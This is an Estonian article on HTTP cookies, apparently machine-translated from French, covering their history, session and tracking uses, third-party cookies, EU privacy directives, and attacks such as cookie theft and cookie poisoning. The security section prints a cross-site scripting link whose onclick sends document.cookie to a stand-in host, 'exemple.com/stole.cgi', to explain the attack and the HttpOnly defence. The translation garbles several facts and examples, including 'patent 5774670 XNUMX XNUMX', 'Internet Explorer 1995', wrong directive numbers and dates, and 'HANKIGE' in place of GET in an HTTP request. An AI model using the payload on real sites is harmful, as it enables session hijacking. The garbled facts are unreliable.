Interneti-küpsis: mis see on? Definitsioon, päritolu, tüübid ja privaatsus

Un küpsis või veebiküpsis (Või küpsis, lühendatult kui tunnistaja Quebecis) on HTTP-sideprotokoll defineeritud kui teabejada, mille HTTP-server saadab HTTP-kliendile ja mille viimane tagastab iga kord, kui sama HTTP-serveri kohta teatud tingimustel päringuid tehakse.

Küpsis on samaväärne a terminali salvestatud väike tekstifail Interneti kasutajast. Enam kui 20 aastat eksisteerinud need võimaldavad veebisaitide arendajatel salvestada kasutajaandmeid, et hõlbustada nende navigeerimist ja võimaldada teatud funktsioone. Küpsised on alati olnud suuremal või vähemal määral vastuolulised, kuna need sisaldavad jääkisikuandmeid, mida kolmandad osapooled võivad potentsiaalselt ära kasutada.

Veebiserver saadab selle HTTP-päisena veebibrauserisse, mis tagastab selle muutmata kujul iga kord, kui see serverile pöördub. Küpsist saab kasutada autentimine, seanss (riiklik hooldus) ja eest salvestada konkreetset teavet kasutaja kohta, nagu saidi eelistused või elektroonilise ostukorvi sisu. Mõiste küpsis on tuletatud maagiline küpsis, UNIX-i andmetöötluse tuntud kontseptsioon, mis inspireeris brauseri küpsiste idee ja nime. Küpsistele on mõned alternatiivid, millest igaühel on oma kasutusalad, eelised ja puudused.

Kuna tegemist on lihtsate tekstifailidega, ei ole küpsised käivitatavad. Nad ei ole ei nuhkvara ega viirused, kuigi paljud viirusetõrjetarkvarad tuvastavad mõne saidi küpsised, kuna need võimaldavad kasutajaid mitme saidi külastamisel jälgida. 

Enamik kaasaegseid brausereid võimaldab kasutajatel seda teha otsustada, kas nõustuda küpsistega või mitte. Kasutajad saavad ka valida, kui kaua küpsiseid säilitatakse. Küpsiste täielik tagasilükkamine muudab aga mõned saidid kasutuskõlbmatuks. Näiteks hoidke ostukärusid või saite, mis nõuavad mandaatide (kasutajanimi ja parool) abil sisselogimist.

Ajalooline

Le terme küpsis tuleneb ingliskeelsest terminist maagiline küpsis, mis on andmepakett, mille programm võtab vastu ja tagastab muutmata kujul. Küpsiseid kasutati IT-s juba siis, kui Lou Montulli tekkis idee neid veebisuhtluses kasutada juunis 1994. Sel ajal töötas ta ettevõttes Netscape Communications, mis oli ühe kliendi jaoks välja töötanud e-kaubanduse rakenduse. Küpsised andsid lahenduse poe virtuaalse ostukorvi juurutamise usaldusväärsuse probleemile.

John Giannandrea ja Lou Montulli kirjutasid Netscape'i esimese küpsise spetsifikatsiooni samal aastal. Mosaic Netscape'i beetaversioon 0.9, välja antud 13. oktoobril 1994, integreeritud küpsiste tehnoloogia (vaata postitust). Küpsiste esimene (mitteeksperimentaalne) kasutamine oli selleks, et teha kindlaks, kas Netscape'i veebisaidi külastajad on seda saiti varem külastanud. Montulli esitas küpsiste tehnoloogia patenditaotluse 1995. aastal ja USA patent 5774670 XNUMX XNUMX anti välja. antud 1998. aastal.

Pärast Netscape 0.9 beetaversiooni juurutamist 1994. aastal integreeriti küpsised 2. aasta oktoobris välja antud Internet Explorer 1995-sse.

Küpsiste kasutuselevõtt pole avalikkusele veel laiemalt tuntud. Eelkõige võeti brauseri seadetes vaikimisi vastu küpsised ja kasutajaid ei teavitatud nende olemasolust. Mõned inimesed olid küpsiste olemasolust teadlikud 1995. aasta esimeses kvartalis, kuid avalikkus hakkas nende olemasolust aru saama alles pärast seda, kui Financial Times avaldas artikli 12. veebruaril 1996. Samal aastal pälvisid küpsised meedias palju tähelepanu. võimalike privaatsusrikkumiste tõttu. Küpsiste teemat arutati kahel Ameerika Föderaalse Kaubanduskomisjoni konsultatsioonil 1996. ja 1997. aastal.

Ametliku küpsiste spetsifikatsiooni väljatöötamine oli juba käimas. Ametliku spetsifikatsiooni esimesed arutelud toimusid 1995. aasta aprillis www-talk meililistis. Moodustati spetsiaalne IETF-i töörühm. Kaks alternatiivset ettepanekut HTTP-tehingute oleku juurutamiseks pakkusid välja vastavalt Brian Behlendorf ja David Kristol, kuid Kristoli enda juhitud grupp otsustas lähtepunktina kasutada Netscape'i spetsifikatsiooni. 1996. aasta veebruaris tegi töörühm kindlaks, et kolmanda osapoole küpsised kujutavad endast olulist ohtu privaatsusele. Rühma koostatud spetsifikatsioon avaldati lõpuks kujul RFC 2109.

Alates 2014. aasta lõpust näeme paljudel saitidel bännerit küpsiste kohta. Seal on vähemalt üks brauserilaiend, mis võimaldab bännerit ei kuvata.

Küpsiste tüübid ja kasutusalad

Seansi juhtimine

Küpsiseid saab kasutada kasutajaandmete säilitamiseks navigeerimise ajal, aga ka mitme külastuse ajal. Küpsised võeti kasutusele selleks, et pakkuda vahendit elektrooniliste ostukärude juurutamiseks – virtuaalne seade, millesse kasutaja saab saidi sirvimise ajal koguda kaupu, mida ta soovib osta.

Tänapäeval salvestavad sellised rakendused nagu ostukärud kaupade loendi serveri andmebaasi, mis on eelistatav. kui neid küpsisesse salvestada. Veebiserver saadab unikaalset seansi ID-d sisaldava küpsise. Seejärel tagastab veebibrauser selle seansi ID iga järgneva päringu korral ning ostukorvis olevad kaubad salvestatakse ja seostatakse sama kordumatu seansi ID-ga.

Küpsiste sagedane kasutamine on kasulik mandaatide abil saidile sisselogimisel. Lühidalt, veebiserver saadab esmalt unikaalset seansi ID-d sisaldava küpsise. Seejärel esitavad kasutajad oma mandaadid (tavaliselt kasutajanimi ja parool). Seejärel autentib veebirakendus seansi ja võimaldab kasutajal teenusele juurde pääseda.

personaalse

Küpsiseid saab kasutada saidi kasutaja kohta teabe meeldejätmiseks, et talle tulevikus sobivat sisu näidata. Näiteks võib veebiserver saata küpsise, mis sisaldab viimati sellele veebisaidile sisselogimiseks kasutatud kasutajanime, nii et kasutajanime saab tulevaste külastuste korral eelnevalt sisestada.

Paljud veebisaidid kasutavad isikupärastamiseks küpsiseid vastavalt kasutaja eelistustele. Kasutajad valivad vormis oma eelistused ja edastavad need serverisse. Server kodeerib eelistused küpsisesse ja saadab selle tagasi brauserisse. Seejärel tagastab brauser iga kord, kui kasutaja selle saidi lehele siseneb, küpsise ja seega ka eelistuste loendi; server saab seejärel kohandada lehte vastavalt kasutaja eelistustele. Näiteks Wikipedia veebisait võimaldab kasutajatel valida soovitud saidi naha. Google'i otsingumootor võimaldab oma kasutajatel (isegi kui nad pole registreerunud) valida, mitu tulemust nad igal tulemuste lehel näha tahavad.

Jälgimine

Jälgimisküpsiseid kasutatakse Interneti-kasutajate sirvimisharjumuste jälgimiseks. Seda saab osaliselt teha ka lehe päringu esitava arvuti IP-aadressi või 'viite' HTTP-päise abil, mille klient saadab iga päringuga, kuid küpsised võimaldavad suuremat täpsust. Seda saab teha järgmises näites:

1. Kui kasutaja avab saidi lehe ja päring ei sisalda küpsist, eeldab server, et see on esimene leht, mida kasutaja külastab. Seejärel loob server juhusliku stringi ja saadab selle koos soovitud lehega brauserisse.
2. Sellest hetkest alates saadab brauser automaatselt küpsise iga kord, kui kutsutakse saidi uus leht. Server saadab lehe nagu tavaliselt, kuid logib logifaili ka kutsutud lehe URL-i, päringu kuupäeva, kellaaja ja küpsise.

Logifaili vaadates on siis võimalik näha, milliseid lehti ja mis järjekorras kasutaja on külastanud. Näiteks kui fail sisaldab mõnda päringut, mis on tehtud küpsise id=abc abil, võib see tuvastada, et kõik need päringud pärinevad samalt kasutajalt. Taotletud URL, päringutega seotud kuupäev ja kellaaeg võimaldavad jälgida kasutaja sirvimist.

Kolmandate osapoolte küpsised ja veebimajakad, mida selgitatakse allpool, võimaldavad lisaks jälgida erinevate saitide vahel. Ühe saidi jälgimist kasutatakse üldiselt statistilistel eesmärkidel. Seevastu jälgimist erinevatel saitidel, kasutades kolmanda osapoole küpsiseid, kasutavad reklaamifirmad üldiselt anonüümsete kasutajaprofiilide loomiseks (mida kasutatakse siis selleks, et määrata, milliseid reklaame tuleks kasutajale näidata ning saata talle nendele reklaamidele vastavaid e-kirju – rämpspost ).

Jälgimisküpsised on kasutaja privaatsuse rikkumise oht, kuid neid saab kergesti kustutada. Enamik kaasaegseid brausereid sisaldab võimalust püsivad küpsised rakenduse sulgemisel automaatselt kustutada.

Kolmanda osapoole küpsised

Veebilehel olevad pildid ja muud objektid võivad asuda serverites, mis erinevad lehte majutavast serverist. Lehe kuvamiseks laadib brauser kõik need objektid alla. Enamik veebisaite sisaldab teavet erinevatest allikatest. Näiteks kui sisestate oma brauserisse www.example.com, on lehe osas sageli objekte või reklaame, mis pärinevad erinevatest allikatest, st erinevast domeenist kui www. .example.com. "Esimese osapoole küpsised" on küpsised, mille määrab brauseri aadressiribal loetletud domeen. Kolmanda osapoole küpsised seab üks leheobjektidest, mis pärineb teisest domeenist.

Vaikimisi aktsepteerivad brauserid, nagu Mozilla Firefox, Microsoft Internet Explorer ja Opera, kolmandate osapoolte küpsiseid, kuid kasutajad saavad nende blokeerimiseks brauseri valikutes sätteid muuta. Veebi funktsionaalsust võimaldavatel kolmandate osapoolte küpsistega ei kaasne turvariski, kuid neid kasutatakse ka kasutajate jälgimiseks. saidilt saidile.

Tööriistad, nagu Ghostery, mis on saadaval kõikidele brauseritele, sealhulgas Google Chrome'ile, võivad blokeerida teabevahetuse kolmandate osapoolte vahel.

Rakendamine

Küpsised on väikesed andmetükid, mille veebiserver saadab brauserisse. Brauser tagastab need muutmata kujul serverisse, lisades muidu olekuta HTTP-tehingusse oleku (mineviku sündmuste mälu). Ilma küpsisteta on iga veebilehe või veebilehe komponendi otsimine isoleeritud sündmus, mis ei sõltu muudest samale saidile tehtud päringutest. Lisaks sellele, et küpsiseid saab määrata veebiserveri poolt, saab neid määrata ka skriptikeeltega, nagu JavaScript, kui brauser seda toetab ja lubab.

Ametlik küpsiste spetsifikatsioon viitab sellele, et brauserid peaksid suutma salvestada ja uuesti saata minimaalse arvu küpsiseid. Täpsemalt peaks brauser suutma salvestada vähemalt 300 nelja kilobaidise küpsisefaili ja ühe serveri või domeeni jaoks vähemalt 20 küpsist.

Vastavalt punktile 3.1 RFC 2965, küpsiste nimed ei ole tõstutundlikud.

Küpsis võib määrata oma aegumiskuupäeva, sel juhul küpsis sellel kuupäeval kustutatakse. Kui küpsis ei määra aegumiskuupäeva, kustutatakse küpsis kohe, kui kasutaja brauserist lahkub. Seetõttu on aegumiskuupäeva määramine viis, kuidas küpsis püsib läbi mitme seansi. Sel põhjusel öeldakse, et aegumiskuupäevaga küpsised on püsiv. Rakenduse näide: jaemüügisait võib kasutada püsivaid küpsiseid, et salvestada esemed, mille kasutajad on ostukorvi pannud (tegelikkuses võib küpsis viidata kirjele, mis on salvestatud müügikoha andmebaasi, mitte teie arvutisse). . See tähendab, et kui kasutajad lahkuvad brauserist ostmata ja naasevad sellesse hiljem, saavad nad ostukorvis olevad kaubad uuesti üles leida. Kui need küpsised ei annaks aegumiskuupäeva, aeguksid need brauseri sulgemisel ja teave ostukorvi sisu kohta kaoks.

Küpsiste ulatus võib olla piiratud konkreetse domeeni, alamdomeeni või teega need loonud serveris.

Küpsise loomine

Veebilehtede edastamine toimub HTTP-protokolli (HyperText Transfer Protocol) abil. Küpsiseid ignoreerides helistavad brauserid veebiserveritest lehele, saates neile üldjuhul lühikese teksti HTTP taotlus. Näiteks lehele www.example.org/index.html pääsemiseks loovad brauserid ühenduse serveriga www.example.org ja saadavad päringu, mis näeb välja järgmine:

	GET /index.html HTTP/1.1Host: www.example.org
Navigateur	→	Serveur

Server vastab, saates soovitud lehe, millele eelneb sarnane tekst, kutsutakse välja kogu HTTP vastus. See pakett võib sisaldada ridu, mis juhendavad brauserit küpsiseid salvestama:

	HTTP/1.1 200 OKContent-type: text/htmlSet-Cookie: nimi=väärtus (HTML leht)
Navigateur	←	Serveur

Server saadab Set-Cookie rea ainult siis, kui server soovib, et brauser salvestaks küpsise. Set-Cookie on taotlus, et brauser salvestaks stringi name=value ja tagastaks selle kõigis tulevastes päringutes serverile. Kui brauser toetab küpsiseid ja küpsised on brauseri valikutes lubatud, lisatakse küpsis kõikidesse järgmistesse samale serverile tehtud päringutesse. Näiteks kutsub brauser lehele www.example.org/news.html, saates serverile www.example.org järgmise päringu:

	HANKIGE /news.html HTTP/1.1Host: www.example.orgKüpsis: name=valueNõustu: */*
Navigateur	→	Serveur

See on sama serveri teise lehe päring ja erineb ülaltoodud esimesest, kuna sisaldab stringi, mille server varem brauserisse saatis. Tänu sellele vahendile teab server, et see päring on lingitud eelmisega. Server vastab kutsutud lehe saatmisega ja sellele ka muid küpsiseid lisades.

Küpsise väärtust saab server muuta, saates vastuseks kutsutud lehele uue rea Set-Cookie: name=new_value. Seejärel asendab brauser vana väärtuse uuega.

Set-Cookie rida loob tavaliselt CGI programm või muu skriptikeel, mitte HTTP-server. HTTP-server (näide: Apache) edastab brauserisse ainult programmi tulemuse (dokument, millele eelneb küpsiseid sisaldav päis).

Küpsiseid saab määrata ka brauseris töötava JavaScripti või muude sarnaste keelte abil, st pigem kliendi kui serveri poolel. JavaScriptis kasutatakse selleks objekti document.cookie. Näiteks lause document.cookie = "temperature=20" loob küpsise nimega "temperatuur" ja väärtusega 20.

Küpsise atribuudid

Lisaks nime/väärtuse paarile võib küpsis sisaldada ka aegumiskuupäeva, teed, domeeninime ja kavandatud ühenduse tüüpi, st tavaline või krüpteeritud. RFC 2965 määratleb ka, et küpsistel peab olema kohustuslik versiooninumber, kuid see jäetakse üldiselt välja. Need andmeosad järgivad paari nimi=uus_väärtus ja on eraldatud semikooloniga. Näiteks saab server luua küpsise, saates Set-Cookie rea: nimi=uus_väärtus; aegub=kuupäev; tee=/; domeen=.example.org.

Küpsise aegumine

Küpsised aeguvad ja brauser ei saada neid serverisse järgmistel juhtudel:

• Kui brauser on suletud, kui küpsis ei ole püsiv.
• Kui küpsise aegumiskuupäev on möödas.
• Kui küpsise aegumiskuupäev muudetakse (serveri või skripti poolt) minevikku.
• Kui brauser kustutab küpsise kasutaja nõudmisel.

Kolmas olukord võimaldab serveritel või skriptidel küpsise selgesõnaliselt kustutada. Pange tähele, et Google Chrome'i veebibrauseris on võimalik teada konkreetse küpsise aegumiskuupäeva sisuseadete kaudu. Arvutisse salvestatud küpsis võib seal väga hästi püsida mitu aastakümmet, kui selle kustutamiseks ei võeta ette mingeid protseduure.

Stereotüübid

Pärast nende Internetis kasutuselevõttu on Internetis ja meedias ringlenud palju ideid küpsiste kohta. 1998. aastal otsustas Ameerika Ühendriikide energeetikaministeeriumi arvutiintsidentide jälgimise meeskond CIAC, et küpsiste turvanõrkused on "põhimõtteliselt olematud" ja selgitas, et "teave teie külastuste päritolu ja teie külastatud veebilehtede üksikasjade kohta on juba veebiserverite logifailides olemas”. 2005. aastal avaldas Jupiter Research uuringu tulemused, milles märkimisväärne protsent vastajatest pidas järgmisi väiteid:

• Küpsised on nagu viirus, nakatavad nad kasutajate kõvakettaid.
• Küpsised genereerivad pop-up.
• Saatmiseks kasutatakse küpsiseid spam.
• Küpsiseid kasutatakse ainult reklaamimiseks.

Küpsised ei saa kasutaja arvutist teavet kustutada ega lugeda. Küpsised võimaldavad siiski tuvastada veebilehti, mida kasutaja teatud saidil või saitide komplektil külastas. Seda teavet saab koguda kasutajaprofiili, mida saab kasutada või edasi müüa kolmandatele osapooltele, mis võib põhjustada tõsiseid privaatsusprobleeme. Mõned profiilid on anonüümsed selles mõttes, et need ei sisalda isiklikku teavet, kuid isegi sellised profiilid võivad olla küsitavad.

Sama uuringu kohaselt ei tea suur protsent internetikasutajatest, kuidas küpsiseid kustutada. Üks põhjusi, miks inimesed küpsiseid ei usalda, on see, et mõned saidid on kuritarvitanud küpsiste isikut tuvastavat aspekti ja jaganud seda teavet teiste allikatega. Suur osa sihitud reklaamidest ja soovimatutest meilidest, mida peetakse rämpspostiks, pärineb jälgimisküpsistest kogutud teabest.

Brauseri seaded

Enamik brausereid toetab küpsiseid ja võimaldab kasutajal need keelata. Kõige tavalisemad valikud on järgmised:

• Lubage või keelake küpsised täielikult, et neid pidevalt aktsepteeritakse või blokeeritakse.
• Lubage kasutajal näha antud lehe aktiivseid küpsiseid, sisestades brauseri aadressiribale javascript: alert(document.cookie). Mõned brauserid sisaldavad küpsiste haldurit kasutaja jaoks, kes saab vaadata ja valikuliselt kustutada brauseris praegu salvestatud küpsiseid.

Enamik brausereid lubab ka isikuandmete, sealhulgas küpsiste, täielikku kustutamist. Küpsiste lubade kontrollimiseks on olemas ka lisamoodulid.

Privaatsus ja kolmandate osapoolte küpsised

Selles fiktiivses näites on reklaamifirma paigutanud bännerid kahele veebisaidile. Majutades bännereid oma serverites ja kasutades kolmanda osapoole küpsiseid, suudab reklaamiettevõte jälgida kasutaja navigeerimist nendel kahel saidil.

Küpsistel on oluline mõju veebikasutajate privaatsusele ja anonüümsusele. Kuigi küpsised saadetakse tagasi ainult serverisse, mis need seadis, või samasse Interneti-domeeni kuuluvasse serverisse, võib veebileht siiski sisaldada pilte või muid komponente, mis on salvestatud teistesse domeenidesse kuuluvatesse serveritesse. Nimetatakse küpsised, mis seatakse nende väliskomponentide taastamise ajal kolmanda osapoole küpsised. See hõlmab küpsiseid soovimatutest hüpikakendest.

Reklaamiettevõtted kasutavad kolmanda osapoole küpsiseid, et jälgida kasutajaid erinevatel külastatavatel saitidel. Eelkõige saab reklaamiettevõte jälgida kasutajat kõigil lehtedel, kuhu ta on paigutanud reklaampilte või jälgimispiksli. Kasutaja külastatud lehtede tundmine võimaldab reklaamiettevõttel sihtida kasutaja reklaamieelistusi.

Mõned peavad kasutajaprofiili loomise võimalust privaatsuse rikkumiseks, eriti kui jälgimine toimub erinevates domeenides, kasutades kolmanda osapoole küpsiseid. Sel põhjusel on mõnes riigis küpsiseid käsitlevad õigusaktid.

Ameerika Ühendriikide valitsus rakendas küpsiste paigutamise suhtes ranged reeglid 2000. aastal pärast seda, kui selgus, et Valge Maja uimastipoliitika amet kasutas küpsiseid veebipõhiseid uimastireklaame vaatavate kasutajate arvutite jälgimiseks. 2002. aastal avastas privaatsusaktivist Daniel Brandt, et CIA jättis tema veebisaite külastanud arvutitesse püsivad küpsised. Pärast sellest rikkumisest teavitamist teatas CIA, et neid küpsiseid ei saadetud tahtlikult, ja lõpetas nende seadistamise. 25. detsembril 2005 avastas Brandt, et riiklik julgeolekuagentuur (NSA) oli tarkvarauuenduse tõttu jätnud külastajate arvutitesse kaks püsivat küpsist. Pärast teavitamist keelas NSA kohe küpsised.

Ühendkuningriigis on Küpsiste seadus “, mis jõustus 25. mail 2012, kohustab saite oma kavatsustest teatama, võimaldades seeläbi kasutajatel valida, kas nad soovivad jätta oma läbimisest Internetti jälgi või mitte. Seega saab neid kaitsta reklaami sihtimise eest. Kuid, vastavalt Eestkostja, ei pruugi Interneti-kasutajate nõusolek olla selgesõnaline; kasutaja nõusoleku tingimustes on tehtud muudatusi, muutes selle seega vihjatud.

Direktiiv 2002/58 eraelu puutumatuse kohta

Direktiiv 202/58 eraelu puutumatust ja elektroonilist sidet sisaldab küpsiste kasutamise eeskirju. Eelkõige nõuab selle direktiivi artikli 5 lõige 3, et andmeid (nt küpsiseid) kasutaja arvutisse saab salvestada ainult siis, kui:

• kasutajat teavitatakse sellest, kuidas andmeid kasutatakse;
• kasutajale antakse võimalus sellest salvestustoimingust keelduda. Kuid see artikkel ütleb ka, et andmete säilitamine tehnilistel põhjustel on sellest seadusest vabastatud.

Kuna direktiiv pidi rakendama alates 2003. aasta oktoobrist, siis 2004. aasta detsembri aruande kohaselt rakendati seda direktiivi väga ebatäiuslikult, mis viitas ka sellele, et teatud liikmesriigid (Slovakkia, Läti, Kreeka, Belgia ja Luksemburg) ei ole direktiivi veel üle võtnud. direktiiv siseriiklikusse õigusesse.

G29 2010. aasta arvamuse kohaselt kohaldatakse seda direktiivi, mis näeb eelkõige ette küpsiste kasutamise käitumispõhise reklaami eesmärgil Interneti-kasutaja selgesõnalise nõusoleku alusel, endiselt väga halvasti. Tegelikult teeb enamik saite seda viisil, mis ei vasta direktiivile, piirdudes lihtsa "bänneriga", mis teavitab "küpsiste" kasutamisest, andmata teavet kasutamise kohta, tegemata vahet "tehnilistel" küpsistel. "jälgimisküpsised" ega ka tegeliku valiku pakkumine kasutajale, kes soovib säilitada tehnilisi küpsiseid (näiteks ostukorvi haldamise küpsiseid) ja keelduda jälgimisküpsistest. Tegelikult ei tööta paljud saidid õigesti, kui küpsistest keeldutakse, mis ei vasta direktiivile 2002/58 või direktiivile 95/46 (isikuandmete kaitse).

Direktiivi 2009 / 136 / CE

Seda materjali on ajakohastatud 2009. novembri 136. aasta direktiiviga 25/2009/EÜ, mis sätestab, et "teabe salvestamine või juba salvestatud teabele juurdepääsu saamine abonendi või kasutaja lõppseadmes on lubatud ainult tingimusel, et tellija või kasutaja on andnud oma nõusoleku pärast seda, kui ta on vastavalt direktiivile 95/46/EÜ saanud selge ja täieliku teabe töötlemise eesmärkide kohta. Seetõttu tugevdab uus direktiiv kohustusi enne küpsiste paigutamist Interneti-kasutaja arvutisse.

Direktiivi esialgsetes kaalutlustes täpsustab Euroopa seadusandja siiski: "Kui see on tehniliselt võimalik ja tõhus, võib vastavalt direktiivi 95/46/EÜ asjakohastele sätetele avaldada kasutaja nõusolekut töötlemiseks brauseri või muu rakenduse vastavate seadete kasutamine”. Kuid tegelikult ei võimalda siiani ükski brauser lahutada olulisi tehnilisi küpsiseid valikulistest küpsistest, mis peaksid jääma kasutaja enda otsustada.

Belgia parlamendiliikmed võtsid selle uue direktiivi üle 2012. aasta juulis. 2014. aasta uuring näitab, et isegi parlamendiliikmetel on raske kohaldada direktiivi piiranguid.

P3P

P3P-spetsifikatsioon sisaldab serveri võimalust esitada privaatsuspoliitika, mis määratleb, millist teavet ta kogub ja mis eesmärgil. Need eeskirjad hõlmavad (kuid mitte ainult) küpsiste abil kogutud teabe kasutamist. P3P definitsioonide kohaselt saab brauser küpsiseid vastu võtta või tagasi lükata, võrreldes privaatsuspoliitikaid kasutaja eelistustega või küsides kasutajalt, esitades serveri poolt deklareeritud privaatsuspoliitika privaatsusavalduse.

Paljud brauserid, sealhulgas Apple Safari ja Microsoft Internet Exploreri versioonid 6 ja 7, toetavad P3P-d, mis võimaldab brauseril otsustada, kas nõustuda kolmanda osapoole küpsiste salvestamisega. Opera brauser võimaldab kasutajatel keelduda kolmandate osapoolte küpsistest ja luua Interneti-domeenidele globaalse ja spetsiifilise turvaprofiili. Mozilla Firefoxi versioon 2 loobus P3P-toest, kuid taastas selle versioonis 3.

Enamik brausereid võivad privaatsuse suurendamiseks ja reklaamide jälgimise vähendamiseks blokeerida kolmandate osapoolte küpsised, ilma et see mõjutaks negatiivselt kasutaja veebikogemust. Paljud reklaamiagentuurid pakuvad võimalust loobuma sihitud reklaamile, seadistades brauseris üldise küpsise, mis selle sihtimise deaktiveerib, kuid selline lahendus ei ole selle järgimisel praktiliselt tõhus, sest see üldine küpsis kustutatakse niipea, kui kasutaja need küpsised kustutab, mis tühistab valiku. välja otsus.

Küpsiste puudused

Lisaks privaatsusprobleemidele on küpsistel ka mõned tehnilised puudused. Eelkõige ei tuvasta need alati täpselt kasutajaid, võivad aeglustada saidi jõudlust, kui neid on palju, neid saab kasutada turvarünneteks ja need lähevad vastuollu tarkvara esindusliku oleku ülekandega, arhitektuurilise stiiliga.

Ebatäpne tuvastamine

Kui arvutis kasutatakse rohkem kui ühte brauserit, on igas neist küpsiste jaoks alati eraldi salvestusseade. Küpsised ei tuvasta seega isikut, vaid kasutajakonto, arvuti ja veebibrauseri kombinatsiooni. Seega saab igaüks kasutada neid kontosid, arvuteid või brausereid, millel on küpsiste hulk. Samamoodi ei tee küpsised vahet mitmel kasutajal, kes jagavad sama kasutajakontot, arvutit ja brauserit, näiteks "internetikohvikutes" või mis tahes kohas, mis annab tasuta juurdepääsu arvutiressurssidele.

Kuid praktikas osutub see väide enamikul juhtudel ekslikuks, sest tänapäeval kasutab "personaalarvutit" (või nutitelefoni või tahvelarvutit, mis veelgi hullem) peamiselt üks üksikisik. See tähendab, et sihitakse konkreetset inimest ja kogutud teabe mahu kaudu jõuavad isikupärastatud sihtimiseni isegi siis, kui isikut pole „nimelt” tuvastatud.

Küpsiste vargus

Teine võrgus olev arvuti võib küpsise varastada.

Tavalise töö käigus saadetakse küpsised tagasi serveri (või samas domeenis asuvate serverite rühma) ja kasutaja arvutibrauseri vahel. Kuna küpsised võivad sisaldada tundlikku teavet (kasutajanimi, autentimiseks kasutatav parool jne), ei tohiks nende väärtused olla teistele arvutitele kättesaadavad. Küpsiste vargus on küpsiste pealtkuulamine volitamata kolmanda osapoole poolt.

Küpsiseid saab varastada pakettide nuusutaja kaudu ründes, mida nimetatakse seansikaaperdamiseks. Liiklust võrgus saavad pealt kuulata ja lugeda ka muud arvutid peale saatvate ja vastuvõtvate arvutite (eriti krüptimata avalikus WiFi-ruumis). See liiklus hõlmab küpsiseid, mis saadetakse seansside kaudu, kasutades tavalist HTTP-protokolli. Kui võrguliiklus ei ole krüptitud, saavad pahatahtlikud kasutajad seega lugeda teiste võrgus olevate kasutajate suhtlust "paketinuusutajate" abil.

Selle probleemi saab lahendada, krüpteerides kasutaja arvuti ja serveri vahelise ühenduse HTTPS-protokolli abil. Server saab määrata a turvaline lipp küpsise seadmise ajal; brauser saadab selle ainult turvalise liini, näiteks SSL-ühenduse kaudu.

Paljud saidid, kuigi kasutavad kasutaja autentimiseks HTTPS-i krüpteeritud sidet (st sisselogimislehte), saadavad hiljem tõhususe huvides krüptimata HTTP-ühenduste kaudu tavapäraselt seansiküpsiseid ja muid andmeid. Ründajad saavad seega pealt kuulata teiste kasutajate küpsiseid ja esineda nendena asjakohastel saitidel või kasutada neid küpsiste rünnakutes.

Skriptimine saidil: küpsis, mida tuleks vahetada ainult serveri ja kliendi vahel, saadetakse teisele kolmandale osapoolele.

Teine võimalus küpsiseid varastada on saitide skriptimine ja lasta brauseril endal küpsiseid saata pahatahtlikele serveritele, mis neid kunagi vastu ei võta. Kaasaegsed brauserid võimaldavad käivitada serverist soovitud koodiosi. Kui küpsistele pääsete juurde käitamise ajal, võidakse nende väärtused mingil kujul edastada serveritele, mis ei peaks neile juurde pääsema. Küpsiste krüpteerimine enne nende saatmist üle võrgu ei aita rünnakut takistada.

Seda tüüpi saidi skriptimist kasutavad ründajad tavaliselt saitidel, mis võimaldavad kasutajatel postitada HTML-i sisu. Integreerides osa ühilduvast koodist HTML-i panusesse, võib ründaja saada teistelt kasutajatelt küpsiseid. Nende küpsiste tundmist saab kasutada varastatud küpsiste abil sama saidiga ühenduse loomisel, olles seega kasutaja, kelle küpsised varastati.

Üks võimalus selliste rünnakute ärahoidmiseks on lipu HttpOnly kasutamine; see on valik, mis on kasutusele võetud alates Internet Exploreri versioonist 6 PHP-s alates versioonist 5.2.0 ja mille eesmärk on muuta küpsis skripti lähedal asuvale kliendile kättesaamatuks. Veebiarendajad peaksid seda oma saidi arendamisel siiski arvesse võtma, et nad oleksid saidil skriptimise suhtes immuunsed.

Teine kasutatav turvaoht on saidil nõudluse väljamõeldis.

Ametlik tehniline spetsifikatsioon lubab küpsiseid tagasi saata ainult selle domeeni serveritesse, kust need pärinevad. Küpsiste väärtust saab aga saata teistele serveritele, kasutades muid vahendeid peale küpsiste päiste.

Eelkõige on skriptikeeltel, nagu JavaScript, üldiselt lubatud küpsiste väärtustele juurde pääseda ja need on võimelised saatma suvalisi väärtusi mis tahes Interneti-serverisse. Seda skriptimisvõimalust kasutatakse veebisaitidel, mis võimaldavad kasutajatel postitada HTML-sisu teistele kasutajatele vaatamiseks.

Näiteks võib domeenis example.com tegutsev ründaja postitada kommentaari, mis sisaldab järgmist linki, mis osutab populaarsele ajaveebile, mida ta muidu ei kontrolli:

<a href="#" onclick="window.location = 'http://exemple.com/stole.cgi?text=' + escape(document.cookie); return false;">Cliquez ici !</a>

Kui mõni teine ​​kasutaja sellel lingil klõpsab, käivitab brauser koodi atribuudi onclick osa, nii et see asendab stringi document.cookie selle lehe aktiivsete kasutajaküpsiste loendiga. Seetõttu saadetakse see küpsiste loend serverisse example.com ja seetõttu on ründajal võimalik selle kasutaja küpsiseid koguda.

Seda tüüpi rünnakut on kasutaja poolel raske tuvastada, kuna skript pärineb samast domeenist, mis määras küpsise, ja näib, et väärtuste saatmise toiming on selle domeeni poolt volitatud. Arvatakse, et seda tüüpi saiti haldavate administraatorite kohustus on kehtestada piirangud, mis takistavad pahatahtliku koodi avaldamist.

Küpsised ei ole kliendipoolsetele programmidele, näiteks JavaScriptile, otse nähtavad, kui need saadeti lipuga HttpOnly. Serveri seisukohast on ainus erinevus selles, et Set-Cookie päise reale on lisatud uus väli, mis sisaldab stringi HttpOnly:

Set-Cookie: RMID=732423sdfs73242; expires=Fri, 31-Dec-2010 23:59:59 GMT; path=/; domain=.exemple.net; HttpOnly

Kui brauser sellise küpsise saab, peaks ta seda järgmises HTTP-vahetuses tavapäraselt kasutama, kuid ei tee seda nähtavaks kliendi poolel käivitatavatele skriptidele. Lipp HttpOnly ei ole ametlike tehniliste spetsifikatsioonide osa ja seda ei rakendata kõigis brauserites. Pange tähele, et praegu ei ole võimalik XMLHTTPRequest meetodil seansiküpsiste lugemist ja kirjutamist takistada.

Sisu muutmine: ründaja saadab serverisse kehtetu küpsise, mis võib olla tehtud serveri saadetud kehtivast küpsisest.

Küpsiste muutmine

Niipea, kui küpsised tuleb salvestada ja muutmata kujul serverisse tagastada, saab ründaja enne nende serverisse tagasisaatmist küpsiste väärtust muuta. Näiteks kui küpsis sisaldab koguväärtust, mida kasutaja peab tasuma poe ostukorvi pandud kaupade eest, seab selle väärtuse muutmine serverile riski, et ründaja küsib alghinnast väiksemat tasu. Küpsiste väärtuse muutmise protsessi nimetatakse küpsise mürgitus ja seda saab kasutada pärast küpsiste vargust, et muuta rünnak püsivaks.

